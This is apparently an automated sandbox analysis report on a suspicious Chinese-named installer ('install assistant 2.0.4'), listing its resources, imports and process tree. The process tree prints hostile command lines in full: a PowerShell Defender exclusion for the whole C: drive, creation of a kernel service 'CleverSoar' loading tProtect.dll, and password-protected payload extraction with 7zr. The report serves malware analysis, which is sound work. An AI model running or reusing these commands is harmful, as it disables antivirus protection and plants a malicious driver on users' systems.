                                        RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                                        RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                                        RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                                        RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                                        RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                                        RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                                        RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                                        RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                                        RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                                        RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                                        RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                                        RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                                        RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                                        RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                                        RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                                        RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                                        RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                                        RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                                        RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                                        RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                                        RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                                        RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                                        RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1590909090909092
                                        RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                                        RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2804532577903683
                                        RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                                        DLL | Import
                                        kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                        comctl32.dll | InitCommonControls
                                        user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                        oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                        advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                        NameOrdinalAddress
                                        __dbk_fcall_wrapper20x40fc10
                                        dbkFCallWrapperAddr10x4b063c
                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States
                                        No network behavior found

                                        Target ID:0
                                        Start time:01:40:29
                                        Start date:23/12/2024
                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
                                        Imagebase:0x430000
                                        File size:5'707'417 bytes
                                        MD5 hash:A32B45411FDACB8DC364E2ECC75F7C54
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:01:40:29
                                        Start date:23/12/2024
                                        Path:C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$2044E,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
                                        Imagebase:0xa50000
                                        File size:3'366'912 bytes
                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:01:40:30
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:01:40:30
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:01:40:30
                                        Start date:23/12/2024
                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
                                        Imagebase:0x430000
                                        File size:5'707'417 bytes
                                        MD5 hash:A32B45411FDACB8DC364E2ECC75F7C54
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:false

                                        Target ID:5
                                        Start time:01:40:31
                                        Start date:23/12/2024
                                        Path:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$6047A,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
                                        Imagebase:0x10000
                                        File size:3'366'912 bytes
                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low
                                        Has exited:true

                                        Target ID:6
                                        Start time:01:40:34
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:01:40:34
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:01:40:34
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:01:40:34
                                        Start date:23/12/2024
                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                        Wow64 process (32bit):true
                                        Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                        Imagebase:0xc70000
                                        File size:831'200 bytes
                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        • Detection: 0%, Virustotal
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:10
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:11
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                        Wow64 process (32bit):true
                                        Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                        Imagebase:0xc70000
                                        File size:831'200 bytes
                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:12
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:13
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:14
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:18
                                        Start time:01:40:35
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:19
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x7ff693ab0000
                                        File size:496'640 bytes
                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:20
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:25
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:26
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:27
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:28
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:29
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:30
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:31
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:32
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:33
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:34
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:35
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:36
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:37
                                        Start time:01:40:36
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:38
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:39
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff7699e0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:40
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:41
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:42
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:43
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:44
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:45
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:46
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:47
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:48
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70f330000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:49
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:50
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
